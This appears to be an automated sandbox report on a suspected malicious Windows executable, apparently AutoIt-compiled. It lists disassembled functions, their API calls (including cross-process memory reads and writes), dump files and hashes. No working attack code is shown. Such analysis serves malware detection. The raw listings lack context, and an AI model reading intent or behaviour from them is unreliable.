                                                                      Function 00A3030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00A3017D,?,00A332FC,?,00000001,00A02592,?), ref: 00A30324
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00A3017D,?,00A332FC,?,00000001,00A02592,?), ref: 00A30331
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00A3017D,?,00A332FC,?,00000001,00A02592,?), ref: 00A3033E
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00A3017D,?,00A332FC,?,00000001,00A02592,?), ref: 00A3034B
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00A3017D,?,00A332FC,?,00000001,00A02592,?), ref: 00A30358
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00A3017D,?,00A332FC,?,00000001,00A02592,?), ref: 00A30365
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 8c1d15764a55c0cd50903c576368f506e4983511fee4fe7880f5b7abca437160
                                                                      • Instruction ID: 6946285ccf2aaf60b83385efe758a7d5493c2397e28271ce24ed1364f05808ec
                                                                      • Opcode Fuzzy Hash: 8c1d15764a55c0cd50903c576368f506e4983511fee4fe7880f5b7abca437160
                                                                      • Instruction Fuzzy Hash: 4E01A272800B159FC7309F66D890812F7F9FF503153158A3FE19656931C371A955CF80
                                                                      Function 009FD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 009FD752
                                                                        • Part of subcall function 009F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000), ref: 009F29DE
                                                                        • Part of subcall function 009F29C8: GetLastError.KERNEL32(00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000,00000000), ref: 009F29F0
                                                                      • _free.LIBCMT ref: 009FD764
                                                                      • _free.LIBCMT ref: 009FD776
                                                                      • _free.LIBCMT ref: 009FD788
                                                                      • _free.LIBCMT ref: 009FD79A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: f3ec67cd27938a477ccede6ce3fa64c71e5d2dc6646864b6db231db41d45e509
                                                                      • Instruction ID: e81c61bfbe0b4ca1feb2c88a94c70441b7ffeab0382f7f5033c98ed6575bfac8
                                                                      • Opcode Fuzzy Hash: f3ec67cd27938a477ccede6ce3fa64c71e5d2dc6646864b6db231db41d45e509
                                                                      • Instruction Fuzzy Hash: 26F0127258520DABC621FBA4FAC5E3A77DEBB447207A40805F258EB511C770FC808B74
                                                                      Function 00A25C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00A25C58
                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00A25C6F
                                                                      • MessageBeep.USER32(00000000), ref: 00A25C87
                                                                      • KillTimer.USER32(?,0000040A), ref: 00A25CA3
                                                                      • EndDialog.USER32(?,00000001), ref: 00A25CBD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      • Opcode ID: d836274a251513195687e8b654ea0348146b6f5317157e5712a679062bb2e406
                                                                      • Instruction ID: 574b55efd66bc99af546cd8c9910a4b77b43ea9c60ad40abcce63eea2b02de20
                                                                      • Opcode Fuzzy Hash: d836274a251513195687e8b654ea0348146b6f5317157e5712a679062bb2e406
                                                                      • Instruction Fuzzy Hash: 2101AE309007149FEB259B64ED4EF9577B8FF04706F001569B543614E1E7F0AA45CB50
                                                                      Function 009F22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 009F22BE
                                                                        • Part of subcall function 009F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000), ref: 009F29DE
                                                                        • Part of subcall function 009F29C8: GetLastError.KERNEL32(00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000,00000000), ref: 009F29F0
                                                                      • _free.LIBCMT ref: 009F22D0
                                                                      • _free.LIBCMT ref: 009F22E3
                                                                      • _free.LIBCMT ref: 009F22F4
                                                                      • _free.LIBCMT ref: 009F2305
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 4a70a96a9c228d490ed09e848385b824484d88ec932522eafe3390c902f88eb1
                                                                      • Instruction ID: cc5c0051ae07cb306a8f7049a2d173ddd849b8c39195c045d3dc4038635ab719
                                                                      • Opcode Fuzzy Hash: 4a70a96a9c228d490ed09e848385b824484d88ec932522eafe3390c902f88eb1
                                                                      • Instruction Fuzzy Hash: 1AF03A71A801268BC612FFD8BD01EA83B68BB187A0700055BF524D72B1CB700993AFE4
                                                                      Function 009D95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EndPath.GDI32(?), ref: 009D95D4
                                                                      • StrokeAndFillPath.GDI32(?,?,00A171F7,00000000,?,?,?), ref: 009D95F0
                                                                      • SelectObject.GDI32(?,00000000), ref: 009D9603
                                                                      • DeleteObject.GDI32 ref: 009D9616
                                                                      • StrokePath.GDI32(?), ref: 009D9631
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: aa02fde2cbf0bfa729d1b2af6c6737ef527559e2721caabc0519a1b77fe438ec
                                                                      • Instruction ID: ffc67c8436969152dee694282ffbaf6e1dc8a8b94275124cdcae27ee1828662d
                                                                      • Opcode Fuzzy Hash: aa02fde2cbf0bfa729d1b2af6c6737ef527559e2721caabc0519a1b77fe438ec
                                                                      • Instruction Fuzzy Hash: A8F01930145705EFDB12EFA5ED187643B65BB01372F448216F425551F1CB318992DF20
                                                                      Function 009F0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$_free
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 3432400110-3206640213
                                                                      • Opcode ID: b08acab1262753b2003cceb2b06f4f4a6f92061422a24b3cbf6f0d40426f1563
                                                                      • Instruction ID: b9936d3bf3a9dec2c21606e7c8b836b04957dfa25b5f4f78d7215c779a3cd742
                                                                      • Opcode Fuzzy Hash: b08acab1262753b2003cceb2b06f4f4a6f92061422a24b3cbf6f0d40426f1563
                                                                      • Instruction Fuzzy Hash: 08D1F031A0420EDBDB289F68C855BFEB7B9EF05300F284519EB11AB650D7B99D80CBD1
                                                                      Function 00A47B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009E0242: EnterCriticalSection.KERNEL32(00A9070C,00A91884,?,?,009D198B,00A92518,?,?,?,009C12F9,00000000), ref: 009E024D
                                                                        • Part of subcall function 009E0242: LeaveCriticalSection.KERNEL32(00A9070C,?,009D198B,00A92518,?,?,?,009C12F9,00000000), ref: 009E028A
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 009E00A3: __onexit.LIBCMT ref: 009E00A9
                                                                      • __Init_thread_footer.LIBCMT ref: 00A47BFB
                                                                        • Part of subcall function 009E01F8: EnterCriticalSection.KERNEL32(00A9070C,?,?,009D8747,00A92514), ref: 009E0202
                                                                        • Part of subcall function 009E01F8: LeaveCriticalSection.KERNEL32(00A9070C,?,009D8747,00A92514), ref: 009E0235
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                                      • API String ID: 535116098-3733170431
                                                                      • Opcode ID: 1ef9a83ef216ee21e5b48106016110d5e62ee268a2313a1cd12f09e304daa4dd
                                                                      • Instruction ID: 10afad40e811ba03e739ff781623aeab4da8176a36e8411ef432a4dc7ae36987
                                                                      • Opcode Fuzzy Hash: 1ef9a83ef216ee21e5b48106016110d5e62ee268a2313a1cd12f09e304daa4dd
                                                                      • Instruction Fuzzy Hash: 3A917978A04249EFCB14EF94D991EBDB7B1FF88304F108059F806AB292DB71AE45CB51
                                                                      Function 00A22716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A2B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A221D0,?,?,00000034,00000800,?,00000034), ref: 00A2B42D
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A22760
                                                                        • Part of subcall function 00A2B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A221FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00A2B3F8
                                                                        • Part of subcall function 00A2B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00A2B355
                                                                        • Part of subcall function 00A2B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A22194,00000034,?,?,00001004,00000000,00000000), ref: 00A2B365
                                                                        • Part of subcall function 00A2B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A22194,00000034,?,?,00001004,00000000,00000000), ref: 00A2B37B
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A227CD
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A2281A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 3175977b152cb6916c7100cbb96e96f548ab25d267981b7cd7df4398702eb9f2
                                                                      • Instruction ID: fca6b1cab0ead106faf776737b6e8589da3af18031f222cb52900dbdc571d68e
                                                                      • Opcode Fuzzy Hash: 3175977b152cb6916c7100cbb96e96f548ab25d267981b7cd7df4398702eb9f2
                                                                      • Instruction Fuzzy Hash: 41410C72900228BFDB10DFA8D985BDEBBB8EB05700F104065EA55B7181DA706E45CB61
                                                                      Function 009F172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\plZuPtZoTk.exe,00000104), ref: 009F1769
                                                                      • _free.LIBCMT ref: 009F1834
                                                                      • _free.LIBCMT ref: 009F183E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Users\user\Desktop\plZuPtZoTk.exe
                                                                      • API String ID: 2506810119-3742649600
                                                                      • Opcode ID: 480109f44b7379202d203005191964d99df904a216ebcfe8ea9c163e1343a2c5
                                                                      • Instruction ID: 0e1f582d38a20a6ab0787fcc0de05c56eb1d25f500c55a5a1d00dcf065eae327
                                                                      • Opcode Fuzzy Hash: 480109f44b7379202d203005191964d99df904a216ebcfe8ea9c163e1343a2c5
                                                                      • Instruction Fuzzy Hash: 76318E71A0021CEFDB21EB999981EAEBBFCEB85350F204167FA0497211DB708E41CBD0
                                                                      Function 00A2C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A2C306
                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00A2C34C
                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A91990,01665130), ref: 00A2C395
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem
                                                                      • String ID: 0
                                                                      • API String ID: 135850232-4108050209
                                                                      • Opcode ID: 1cb050de16b7b0b523680f93e5e2128cc0276491ec6ce34c6357ffc34f55a177
                                                                      • Instruction ID: dc0fe2836032d1a2e4ae5c0a088677c5f4207c8d8511f08af6a01aee1b8d8312
                                                                      • Opcode Fuzzy Hash: 1cb050de16b7b0b523680f93e5e2128cc0276491ec6ce34c6357ffc34f55a177
                                                                      • Instruction Fuzzy Hash: 59419F712043519FD720DF29E884B5EBBE8AF85320F148A2DF9A59B2D1D770E904CB62
                                                                      Function 00A54416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A5CC08,00000000,?,?,?,?), ref: 00A544AA
                                                                      • GetWindowLongW.USER32 ref: 00A544C7
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A544D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: 7ed6edb7fd848e59af766d9156ad6c6c7272d63c3994e352b8e7e2be933d5183
                                                                      • Instruction ID: afc0a6f45c03992b88f11e742896d36f62e879f6055727f2dd284c2aee548638
                                                                      • Opcode Fuzzy Hash: 7ed6edb7fd848e59af766d9156ad6c6c7272d63c3994e352b8e7e2be933d5183
                                                                      • Instruction Fuzzy Hash: C8318931240605AFDB209F78DC45BEA7BA9FB48339F208715F979A21E0D770AC959B50
                                                                      Function 00A4304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A4335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00A43077,?,?), ref: 00A43378
                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A4307A
                                                                      • _wcslen.LIBCMT ref: 00A4309B
                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00A43106
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                      • String ID: 255.255.255.255
                                                                      • API String ID: 946324512-2422070025
                                                                      • Opcode ID: d18004c70f5b8da6f1e840abceeb22cce954dec559b677805f08821874b5cd87
                                                                      • Instruction ID: eeb2a2c18ecbbb49d858941990843bd7a0af4c5f347cf913a72c158685388348
                                                                      • Opcode Fuzzy Hash: d18004c70f5b8da6f1e840abceeb22cce954dec559b677805f08821874b5cd87
                                                                      • Instruction Fuzzy Hash: 8E31C13A600201DFDF10CF68C585EAA77F0EF94318F248299E9159B392DB72EE41C761
                                                                      Function 00A54653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A54705
                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A54713
                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A5471A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyWindow
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 4014797782-2298589950
                                                                      • Opcode ID: b14c5a94726d8383e8f6d36cfc7c2d540afd39818bfbbf60fe6416a0cfbf454a
                                                                      • Instruction ID: 2300a7a3147f9c736ba6924a1dc503722a4a431f37ec885c762b147895e5412a
                                                                      • Opcode Fuzzy Hash: b14c5a94726d8383e8f6d36cfc7c2d540afd39818bfbbf60fe6416a0cfbf454a
                                                                      • Instruction Fuzzy Hash: 0E215EB5600209AFEB11DF64DCC1EA737ADFB8E3A9B040459FA009B251DB30EC56CB60
                                                                      Function 00A295AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 176396367-2734436370
                                                                      • Opcode ID: dbc73e04680f9d042e4b4bb2d60fbc34d935f34e6a672063fba117eabce06c9e
                                                                      • Instruction ID: ed643237be7f61e51794f524c9b032acd1badc0d89641f8d6aa541c44d3ae06c
                                                                      • Opcode Fuzzy Hash: dbc73e04680f9d042e4b4bb2d60fbc34d935f34e6a672063fba117eabce06c9e
                                                                      • Instruction Fuzzy Hash: 0D215B32204130AAD331BB2DEC12FB7B3E8AF95B00F10443AF94997141EB619D45C2E6
                                                                      Function 00A537B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A53840
                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A53850
                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A53876
                                                                      Strings
